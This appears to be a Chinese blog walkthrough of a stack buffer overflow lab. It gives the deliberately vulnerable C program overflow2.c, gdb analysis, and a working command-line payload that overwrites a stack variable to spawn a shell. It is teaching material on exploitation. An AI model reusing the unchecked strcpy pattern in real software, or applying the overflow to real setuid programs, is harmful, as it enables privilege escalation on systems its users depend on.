overflow2.c
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/types.h> #include "dump_stack.h" void vuln(int win, char *str) { char buf[64]; strcpy(buf, str); dump_stack((void **) buf, 23, (void **) &win); printf("win = %d\n", win); if (win == 1) { execl("/bin/sh", "sh", NULL); } else { printf("Sorry, you lose.\n"); } exit(0); } int main(int argc, char **argv) { if (argc != 2) { printf("Usage: stack_overwrite [str]\n"); return 1; } uid_t euid = geteuid(); setresuid(euid, euid, euid); vuln(0, argv[1]); return 0; }dump_stack:打印当前cpu的堆栈.
gdb-peda$ checksec CANARY : disabled FORTIFY : disabled NX : disabled PIE : disabled RELRO : Partial由此可见,该程序相当脆弱.只要我们溢出数据,使win为1即可. 两种方法: 方法一:
gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")gdb调试,由于源代码中有if,于是我们进入vuln函数,找到了if对应的汇编代码,如下:
0x8048666 <vuln+62>: mov DWORD PTR [esp],eax 0x8048669 <vuln+65>: call 0x80483f0 <printf@plt> 0x804866e <vuln+70>: mov eax,DWORD PTR [ebp+0x8] **0x8048671 <vuln+73>: cmp eax,0x1** 0x8048674 <vuln+76>: jne 0x8048694 <vuln+108> 0x8048676 <vuln+78>: mov DWORD PTR [esp+0x8],0x0可见这次是拿地址为ebp+0x8的内容与1相比较.同本系列第一篇一样,在cmp出下断点,查看栈中的内容.
gdb-peda$ x/90x 0xffffce20 0xffffce20: 0x410x410x410x410x410x410x410x41 0xffffce28: 0x410x410x410x410x410x410x410x41 0xffffce30: 0x410x410x410x410x410x410x410x41 0xffffce38: 0x410x410x410x410x410x410x410x41 0xffffce40: 0x410x410x410x410x410x410x410x41 0xffffce48: 0x410x410x410x410x410x410x410x41 0xffffce50: 0x410x410x410x410x410x410x410x41 0xffffce58: 0x410x410x410x410x410x410x410x41 0xffffce60: 0x420x420x420x420x000xf10xea0xf7 0xffffce68: 0x980xce0xff0xff0x0b0x870x040x08 0xffffce70: 0x000x000x000x000x650xd10xff0xff 0xffffce78: 0xe80x03对应截图: ebp+0x8=0xffffce70,0xffffce70与char数组相差0x50(0xffffce70-0xffffce20).于是乎构造出
./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")结果图: 其实前本系列前两篇文章思路差不多. 方法二:思路就是写一个自动化脚本,来循环判断是否溢出成功.实现还是有点困难,以后再写. 注:由于操作系统的原因,一些地址可能会有不同,在此一定要以你的电脑上的地址为准.附带相关文件地址:文件地址.欢迎评论!!!
